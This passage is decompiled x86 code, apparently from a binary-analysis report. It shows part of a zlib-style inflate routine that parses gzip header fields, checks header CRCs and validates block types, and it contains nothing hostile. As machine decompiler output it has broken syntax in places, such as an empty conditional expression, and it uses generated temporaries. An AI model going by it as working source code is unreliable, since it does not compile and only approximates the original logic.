                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L28:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __edx + __eax;
                                                                                                          											_t52 = __ebp - 8; // 0x38
                                                                                                          											__eax =  *_t52;
                                                                                                          											__eax =  *_t52 + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											__eflags = __edi - 0x10;
                                                                                                          											if(__edi < 0x10) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L29;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          								case 2:
                                                                                                          									L39:
                                                                                                          									__eflags = __edi - 0x20;
                                                                                                          									if(__edi >= 0x20) {
                                                                                                          										L43:
                                                                                                          										__eax = __ebx[8];
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 4) = __edx;
                                                                                                          										}
                                                                                                          										__eflags = __ebx[4] & 0x00000200;
                                                                                                          										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                          											__eax = __edx;
                                                                                                          											 *(__ebp - 0x14) = __dl;
                                                                                                          											__eax = __edx >> 8;
                                                                                                          											 *(__ebp - 0x13) = __al;
                                                                                                          											__edx = __edx >> 0x10;
                                                                                                          											 *(__ebp - 0x12) = __al;
                                                                                                          											__eax = __ebp - 0x14;
                                                                                                          											__eflags = __edx;
                                                                                                          											 *(__ebp - 0x11) = __dl;
                                                                                                          											__ebx[6] = E008830C1(__ebx[6], __ebp - 0x14, 4);
                                                                                                          										}
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__eax = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 3;
                                                                                                          										 *(__ebp - 0xc) = 0;
                                                                                                          										__edi = 0;
                                                                                                          										goto L48;
                                                                                                          									}
                                                                                                          									L40:
                                                                                                          									_t72 = __ebp - 8; // 0x38
                                                                                                          									__eax =  *_t72;
                                                                                                          									while(1) {
                                                                                                          										L41:
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L42:
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t75 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t75;
                                                                                                          										__eax =  *_t75 + 1;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 8) = __eax;
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi < 0x20) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L43;
                                                                                                          									}
                                                                                                          									goto L322;
                                                                                                          								case 3:
                                                                                                          									L48:
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L52:
                                                                                                          										__ecx = __ebx[8];
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__eax = __dl & 0x000000ff;
                                                                                                          											 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                          											__ecx = __edx;
                                                                                                          											__eax = __ebx[8];
                                                                                                          											__ecx = __edx >> 8;
                                                                                                          											__eflags = __ecx;
                                                                                                          											 *(__ebx[8] + 0xc) = __ecx;
                                                                                                          										}
                                                                                                          										__eflags = __ebx[4] & 0x00000200;
                                                                                                          										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                          											 *(__ebp - 0x14) = __dl;
                                                                                                          											__eax = __ebp - 0x14;
                                                                                                          											__eflags = __edx;
                                                                                                          											 *(__ebp - 0x13) = __dl;
                                                                                                          											__ebx[6] = E008830C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                          										}
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__eax = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 4;
                                                                                                          										__edi = 0;
                                                                                                          										 *(__ebp - 0xc) = 0;
                                                                                                          										 *(__ebp - 0x10) = 0;
                                                                                                          										goto L57;
                                                                                                          									}
                                                                                                          									L49:
                                                                                                          									_t92 = __ebp - 8; // 0x38
                                                                                                          									__eax =  *_t92;
                                                                                                          									while(1) {
                                                                                                          										L50:
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L51:
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t95 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t95;
                                                                                                          										__eax =  *_t95 + 1;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 8) = __eax;
                                                                                                          										__eflags = __edi - 0x10;
                                                                                                          										if(__edi < 0x10) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L52;
                                                                                                          									}
                                                                                                          									goto L322;
                                                                                                          								case 4:
                                                                                                          									L57:
                                                                                                          									__eflags = __ebx[4] & 0x00000400;
                                                                                                          									if((__ebx[4] & 0x00000400) == 0) {
                                                                                                          										L67:
                                                                                                          										__eax = __ebx[8];
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											_t136 = __eax + 0x10;
                                                                                                          											 *_t136 =  *(__eax + 0x10) & 0x00000000;
                                                                                                          											__eflags =  *_t136;
                                                                                                          										}
                                                                                                          										L69:
                                                                                                          										 *__ebx = 5;
                                                                                                          										goto L70;
                                                                                                          									}
                                                                                                          									L58:
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L62:
                                                                                                          										__eax = __ebx[8];
                                                                                                          										__ebx[0x10] = __edx;
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 0x14) = __edx;
                                                                                                          										}
                                                                                                          										__eflags = __ebx[4] & 0x00000200;
                                                                                                          										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                          											 *(__ebp - 0x14) = __dl;
                                                                                                          											__eax = __ebp - 0x14;
                                                                                                          											__eflags = __edx;
                                                                                                          											 *(__ebp - 0x13) = __dl;
                                                                                                          											__ebx[6] = E008830C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                          										}
                                                                                                          										__eax = 0;
                                                                                                          										__edi = 0;
                                                                                                          										 *(__ebp - 0xc) = 0;
                                                                                                          										 *(__ebp - 0x10) = 0;
                                                                                                          										goto L69;
                                                                                                          									}
                                                                                                          									L59:
                                                                                                          									_t116 = __ebp - 8; // 0x38
                                                                                                          									__eax =  *_t116;
                                                                                                          									while(1) {
                                                                                                          										L60:
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L61:
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t119 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t119;
                                                                                                          										__eax =  *_t119 + 1;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 8) = __eax;
                                                                                                          										__eflags = __edi - 0x10;
                                                                                                          										if(__edi < 0x10) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L62;
                                                                                                          									}
                                                                                                          									goto L322;
                                                                                                          								case 5:
                                                                                                          									L70:
                                                                                                          									__eflags = __ebx[4] & 0x00000400;
                                                                                                          									if((__ebx[4] & 0x00000400) == 0) {
                                                                                                          										L83:
                                                                                                          										__edx = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										L84:
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__ebx[0x10] = __edx;
                                                                                                          										 *__ebx = 6;
                                                                                                          										goto L86;
                                                                                                          									}
                                                                                                          									L71:
                                                                                                          									__ecx = __ebx[0x10];
                                                                                                          									__edx =  *(__ebp - 4);
                                                                                                          									__eflags = __ecx - __edx;
                                                                                                          									__ecx =  >  ? __edx : __ecx;
                                                                                                          									 *(__ebp - 0x30) = __ecx;
                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx != 0) {
                                                                                                          										__edx = __ebx[8];
                                                                                                          										__eflags = __edx;
                                                                                                          										if(__edx != 0) {
                                                                                                          											__eax =  *(__edx + 0x10);
                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax != 0) {
                                                                                                          												__eax =  *(__edx + 0x14);
                                                                                                          												__eax =  *(__edx + 0x14) - __ebx[0x10];
                                                                                                          												__edx =  *(__edx + 0x18);
                                                                                                          												 *(__ebp - 0x34) = __eax;
                                                                                                          												__eflags = __eax - __edx;
                                                                                                          												__eax =  *(__ebp - 0x34);
                                                                                                          												if(__eflags <= 0) {
                                                                                                          													__edx = __ecx;
                                                                                                          												} else {
                                                                                                          													__edx = __edx - __eax;
                                                                                                          												}
                                                                                                          												_t152 = __ebp - 8; // 0x38
                                                                                                          												__ecx =  *_t152;
                                                                                                          												__eax = __eax +  *(__ebp - 0x2c);
                                                                                                          												__eflags = __eax;
                                                                                                          												__eax = memcpy(__eax,  *_t152, __edx);
                                                                                                          												__ecx =  *(__ebp - 0x30);
                                                                                                          												__esp = __esp + 0xc;
                                                                                                          											}
                                                                                                          										}
                                                                                                          										__eflags = __ebx[4] & 0x00000200;
                                                                                                          										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                          											_t158 = __ebp - 8; // 0x38
                                                                                                          											__ebx[6] = E008830C1(__ebx[6],  *_t158, __ecx);
                                                                                                          										}
                                                                                                          										__eax =  *(__ebp - 0x30);
                                                                                                          										 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                                                                          										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                          										_t166 =  &(__ebx[0x10]);
                                                                                                          										 *_t166 = __ebx[0x10] - __eax;
                                                                                                          										__eflags =  *_t166;
                                                                                                          									}
                                                                                                          									__edx = 0;
                                                                                                          									__eflags = __ebx[0x10];
                                                                                                          									if(__ebx[0x10] != 0) {
                                                                                                          										goto L322;
                                                                                                          									} else {
                                                                                                          										L82:
                                                                                                          										goto L84;
                                                                                                          									}
                                                                                                          								case 6:
                                                                                                          									L85:
                                                                                                          									__edx = 0;
                                                                                                          									__eflags = 0;
                                                                                                          									L86:
                                                                                                          									__eflags = __ebx[4] & 0x00000800;
                                                                                                          									if((__ebx[4] & 0x00000800) == 0) {
                                                                                                          										L100:
                                                                                                          										__eax = __ebx[8];
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 0x1c) = __edx;
                                                                                                          										}
                                                                                                          										L102:
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 7;
                                                                                                          										__ebx[0x10] = 0;
                                                                                                          										goto L104;
                                                                                                          									}
                                                                                                          									L87:
                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx == 0) {
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									L88:
                                                                                                          									__esi =  *(__ebp - 4);
                                                                                                          									__eax = __edx;
                                                                                                          									_t175 = __ebp - 8; // 0x38
                                                                                                          									__edx =  *_t175;
                                                                                                          									while(1) {
                                                                                                          										L89:
                                                                                                          										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                          										__eax = __eax + 1;
                                                                                                          										 *(__ebp - 0x2c) = __ecx;
                                                                                                          										__ecx = __ebx[8];
                                                                                                          										 *(__ebp - 0x34) = __eax;
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__edx =  *(__ecx + 0x1c);
                                                                                                          											__eflags =  *(__ecx + 0x1c);
                                                                                                          											if( *(__ecx + 0x1c) != 0) {
                                                                                                          												__edx = __ebx[0x10];
                                                                                                          												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                          												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                          													__ecx =  *(__ecx + 0x1c);
                                                                                                          													__eax =  *(__ebp - 0x2c);
                                                                                                          													 *(__ecx + __edx) = __al;
                                                                                                          													_t186 =  &(__ebx[0x10]);
                                                                                                          													 *_t186 = __ebx[0x10] + 1;
                                                                                                          													__eflags =  *_t186;
                                                                                                          													__eax =  *(__ebp - 0x34);
                                                                                                          												}
                                                                                                          											}
                                                                                                          											_t189 = __ebp - 8; // 0x38
                                                                                                          											__edx =  *_t189;
                                                                                                          										}
                                                                                                          										__eflags =  *(__ebp - 0x2c);
                                                                                                          										if( *(__ebp - 0x2c) == 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L95:
                                                                                                          										__eflags = __eax - __esi;
                                                                                                          										if(__eax < __esi) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										break;
                                                                                                          									}
                                                                                                          									L96:
                                                                                                          									__eflags = __ebx[4] & 0x00000200;
                                                                                                          									_t194 = __ebp + 8; // 0x38
                                                                                                          									__esi =  *_t194;
                                                                                                          									if((__ebx[4] & 0x00000200) != 0) {
                                                                                                          										__ebx[6] = __eax;
                                                                                                          										__eax =  *(__ebp - 0x34);
                                                                                                          									}
                                                                                                          									__ecx =  *(__ebp - 4);
                                                                                                          									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                          									__ecx =  *(__ebp - 4) - __eax;
                                                                                                          									__eflags =  *(__ebp - 0x2c);
                                                                                                          									 *(__ebp - 4) = __ecx;
                                                                                                          									if( *(__ebp - 0x2c) != 0) {
                                                                                                          										goto L322;
                                                                                                          									} else {
                                                                                                          										L99:
                                                                                                          										goto L102;
                                                                                                          									}
                                                                                                          								case 7:
                                                                                                          									L103:
                                                                                                          									__edx = 0;
                                                                                                          									__eflags = 0;
                                                                                                          									L104:
                                                                                                          									__eflags = __ebx[4] & 0x00001000;
                                                                                                          									if((__ebx[4] & 0x00001000) == 0) {
                                                                                                          										L118:
                                                                                                          										__eax = __ebx[8];
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 0x24) = __edx;
                                                                                                          										}
                                                                                                          										L120:
                                                                                                          										__edx =  *(__ebp - 0xc);
                                                                                                          										 *__ebx = 8;
                                                                                                          										goto L121;
                                                                                                          									}
                                                                                                          									L105:
                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx == 0) {
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									L106:
                                                                                                          									__esi =  *(__ebp - 4);
                                                                                                          									__eax = __edx;
                                                                                                          									_t210 = __ebp - 8; // 0x38
                                                                                                          									__edx =  *_t210;
                                                                                                          									while(1) {
                                                                                                          										L107:
                                                                                                          										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                          										__eax = __eax + 1;
                                                                                                          										 *(__ebp - 0x2c) = __ecx;
                                                                                                          										__ecx = __ebx[8];
                                                                                                          										 *(__ebp - 0x34) = __eax;
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__edx =  *(__ecx + 0x24);
                                                                                                          											__eflags =  *(__ecx + 0x24);
                                                                                                          											if( *(__ecx + 0x24) != 0) {
                                                                                                          												__edx = __ebx[0x10];
                                                                                                          												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                          												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                          													__ecx =  *(__ecx + 0x24);
                                                                                                          													__eax =  *(__ebp - 0x2c);
                                                                                                          													 *(__ecx + __edx) = __al;
                                                                                                          													_t221 =  &(__ebx[0x10]);
                                                                                                          													 *_t221 = __ebx[0x10] + 1;
                                                                                                          													__eflags =  *_t221;
                                                                                                          													__eax =  *(__ebp - 0x34);
                                                                                                          												}
                                                                                                          											}
                                                                                                          											_t224 = __ebp - 8; // 0x38
                                                                                                          											__edx =  *_t224;
                                                                                                          										}
                                                                                                          										__eflags =  *(__ebp - 0x2c);
                                                                                                          										if( *(__ebp - 0x2c) == 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L113:
                                                                                                          										__eflags = __eax - __esi;
                                                                                                          										if(__eax < __esi) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										break;
                                                                                                          									}
                                                                                                          									L114:
                                                                                                          									__eflags = __ebx[4] & 0x00000200;
                                                                                                          									_t229 = __ebp + 8; // 0x38
                                                                                                          									__esi =  *_t229;
                                                                                                          									if((__ebx[4] & 0x00000200) != 0) {
                                                                                                          										__ebx[6] = __eax;
                                                                                                          										__eax =  *(__ebp - 0x34);
                                                                                                          									}
                                                                                                          									__ecx =  *(__ebp - 4);
                                                                                                          									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                          									__ecx =  *(__ebp - 4) - __eax;
                                                                                                          									__eflags =  *(__ebp - 0x2c);
                                                                                                          									 *(__ebp - 4) = __ecx;
                                                                                                          									if( *(__ebp - 0x2c) != 0) {
                                                                                                          										goto L322;
                                                                                                          									} else {
                                                                                                          										L117:
                                                                                                          										goto L120;
                                                                                                          									}
                                                                                                          								case 8:
                                                                                                          									L121:
                                                                                                          									__eflags = __ebx[4] & 0x00000200;
                                                                                                          									if((__ebx[4] & 0x00000200) == 0) {
                                                                                                          										L129:
                                                                                                          										__edx = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										L130:
                                                                                                          										__ecx = __ebx[8];
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__ebx[4] = __ebx[4] >> 9;
                                                                                                          											__eax = __ebx[4] >> 0x00000009 & 0x00000001;
                                                                                                          											__eflags = __eax;
                                                                                                          											 *(__ecx + 0x2c) = __eax;
                                                                                                          											__eax = __ebx[8];
                                                                                                          											 *(__ebx[8] + 0x30) = 1;
                                                                                                          										}
                                                                                                          										__eax = E008830C1(__edx, __edx, __edx);
                                                                                                          										__ebx[6] = __eax;
                                                                                                          										 *(__esi + 0x30) = __eax;
                                                                                                          										 *__ebx = 0xb;
                                                                                                          										goto L133;
                                                                                                          									}
                                                                                                          									L122:
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L126:
                                                                                                          										__eax = __ebx[6] & 0x0000ffff;
                                                                                                          										__eflags = __edx - (__ebx[6] & 0x0000ffff);
                                                                                                          										if(__edx == (__ebx[6] & 0x0000ffff)) {
                                                                                                          											L128:
                                                                                                          											__edx = 0;
                                                                                                          											__edi = 0;
                                                                                                          											 *(__ebp - 0xc) = 0;
                                                                                                          											 *(__ebp - 0x10) = 0;
                                                                                                          											goto L130;
                                                                                                          										}
                                                                                                          										L127:
                                                                                                          										 *(__esi + 0x18) = "header crc mismatch";
                                                                                                          										goto L17;
                                                                                                          									}
                                                                                                          									L123:
                                                                                                          									_t244 = __ebp - 8; // 0x38
                                                                                                          									__eax =  *_t244;
                                                                                                          									while(1) {
                                                                                                          										L124:
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L125:
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t247 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t247;
                                                                                                          										__eax =  *_t247 + 1;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 8) = __eax;
                                                                                                          										 *(__ebp - 0x10) = __edi;
                                                                                                          										__eflags = __edi - 0x10;
                                                                                                          										if(__edi < 0x10) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L126;
                                                                                                          									}
                                                                                                          									goto L322;
                                                                                                          								case 9:
                                                                                                          									L139:
                                                                                                          									__eflags = __edi - 0x20;
                                                                                                          									if(__edi >= 0x20) {
                                                                                                          										L143:
                                                                                                          										__ecx = __edx;
                                                                                                          										__edi = 0xff00;
                                                                                                          										__ecx = __edx & 0x0000ff00;
                                                                                                          										__edx = __edx << 0x10;
                                                                                                          										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                          										__edx = __edx >> 8;
                                                                                                          										__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                          										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                          										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                          										__edx = __edx >> 0x18;
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__eax = __eax + __edx;
                                                                                                          										__ebx[6] = __eax;
                                                                                                          										 *(__esi + 0x30) = __eax;
                                                                                                          										__eax = 0;
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 0xa;
                                                                                                          										 *(__ebp - 0xc) = 0;
                                                                                                          										__edi = 0;
                                                                                                          										goto L145;
                                                                                                          									}
                                                                                                          									L140:
                                                                                                          									__eax =  *(__ebp - 8);
                                                                                                          									while(1) {
                                                                                                          										L141:
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L142:
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										__eax =  *(__ebp - 8) + 1;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 8) = __eax;
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi < 0x20) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L143;
                                                                                                          									}
                                                                                                          									goto L322;
                                                                                                          								case 0xa:
                                                                                                          									L144:
                                                                                                          									__eax = 0;
                                                                                                          									__eflags = 0;
                                                                                                          									L145:
                                                                                                          									__eflags = __ebx[3] - __eax;
                                                                                                          									if(__ebx[3] == __eax) {
                                                                                                          										L316:
                                                                                                          										__eax =  *(__ebp - 0x1c);
                                                                                                          										 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                          										__eax =  *(__ebp - 0x18);
                                                                                                          										 *(__esi + 0x10) =  *(__ebp - 0x18);
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										 *__esi =  *(__ebp - 8);
                                                                                                          										 *(__esi + 4) = __ecx;
                                                                                                          										__ebx[0xe] = __edx;
                                                                                                          										__ebx[0xf] = __edi;
                                                                                                          										_push(2);
                                                                                                          										goto L137;
                                                                                                          									}
                                                                                                          									L146:
                                                                                                          									__eax = E00882E91(__eax, __eax, __eax);
                                                                                                          									__edx =  *(__ebp - 0xc);
                                                                                                          									__ecx =  *(__ebp - 4);
                                                                                                          									__ebx[6] = __eax;
                                                                                                          									 *(__esi + 0x30) = __eax;
                                                                                                          									 *__ebx = 0xb;
                                                                                                          									goto L147;
                                                                                                          								case 0xb:
                                                                                                          									L147:
                                                                                                          									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
                                                                                                          									if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									L148:
                                                                                                          									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                          									if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									goto L149;
                                                                                                          								case 0xc:
                                                                                                          									L149:
                                                                                                          									__eflags = __ebx[1];
                                                                                                          									if(__ebx[1] == 0) {
                                                                                                          										L151:
                                                                                                          										__eflags = __edi - 3;
                                                                                                          										if(__edi >= 3) {
                                                                                                          											L155:
                                                                                                          											__eax = __edx;
                                                                                                          											__edx = __edx >> 1;
                                                                                                          											__ebx[1] = __eax;
                                                                                                          											__edx = __edx & 0x00000003;
                                                                                                          											__eax = __edx & 0x00000003;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax == 0) {
                                                                                                          												L163:
                                                                                                          												 *__ebx = 0xd;
                                                                                                          												L164:
                                                                                                          												__edx = __edx >> 2;
                                                                                                          												__edi = __edi - 3;
                                                                                                          												L21:
                                                                                                          												 *(_t1164 - 0xc) = _t1054;
                                                                                                          												 *(_t1164 - 0x10) = _t1103;
                                                                                                          												goto L134;
                                                                                                          											}
                                                                                                          											L156:
                                                                                                          											__eax = __eax - 1;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax == 0) {
                                                                                                          												L161:
                                                                                                          												__eax = E00881718(__ebx);
                                                                                                          												 *__ebx = 0x13;
                                                                                                          												__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                          												if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
                                                                                                          													goto L164;
                                                                                                          												}
                                                                                                          												L162:
                                                                                                          												__edx = __edx >> 2;
                                                                                                          												__edi = __edi - 3;
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L157:
                                                                                                          											__eax = __eax - 1;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax == 0) {
                                                                                                          												_push(0x10);
                                                                                                          												_pop(__eax);
                                                                                                          												 *__ebx = __eax;
                                                                                                          											} else {
                                                                                                          												__eax = __eax - 1;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax == 0) {
                                                                                                          													 *(__esi + 0x18) = "invalid block type";
                                                                                                          													 *__ebx = 0x1d;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											goto L164;
                                                                                                          										}
                                                                                                          										L152:
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										while(1) {
                                                                                                          											L153:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L154:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __edx + __eax;
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											__eax =  *(__ebp - 8) + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - 3;
                                                                                                          											if(__edi < 3) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L155;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									L150:
                                                                                                          									__ecx = __edi;
                                                                                                          									 *__ebx = 0x1a;
                                                                                                          									__ecx = __edi & 0x00000007;
                                                                                                          									__edx = __edx >> __cl;
                                                                                                          									__edi = __edi - __ecx;
                                                                                                          									 *(__ebp - 0xc) = __edx;
                                                                                                          									 *(__ebp - 0x10) = __edi;
                                                                                                          									goto L134;
                                                                                                          								case 0xd:
                                                                                                          									L165:
                                                                                                          									__edi = __edi & 0x00000007;
                                                                                                          									__edi = __edi - (__edi & 0x00000007);
                                                                                                          									__edx = __edx >> __cl;
                                                                                                          									 *(__ebp - 0xc) = __edx;
                                                                                                          									 *(__ebp - 0x10) = __edi;
                                                                                                          									__eflags = __edi - 0x20;
                                                                                                          									if(__edi >= 0x20) {
                                                                                                          										L169:
                                                                                                          										__eax = __edx;
                                                                                                          										__ecx = __edx;
                                                                                                          										__eax =  !__edx;
                                                                                                          										__ecx = __edx & 0x0000ffff;
                                                                                                          										__eax =  !__edx >> 0x10;
                                                                                                          										__eflags = __ecx -  !__edx >> 0x10;
                                                                                                          										if(__ecx ==  !__edx >> 0x10) {
                                                                                                          											L171:
                                                                                                          											__eax = 0;
                                                                                                          											__ebx[0x10] = __ecx;
                                                                                                          											__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                          											__edx = 0;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edi = 0;
                                                                                                          											 *(__ebp - 0xc) = 0;
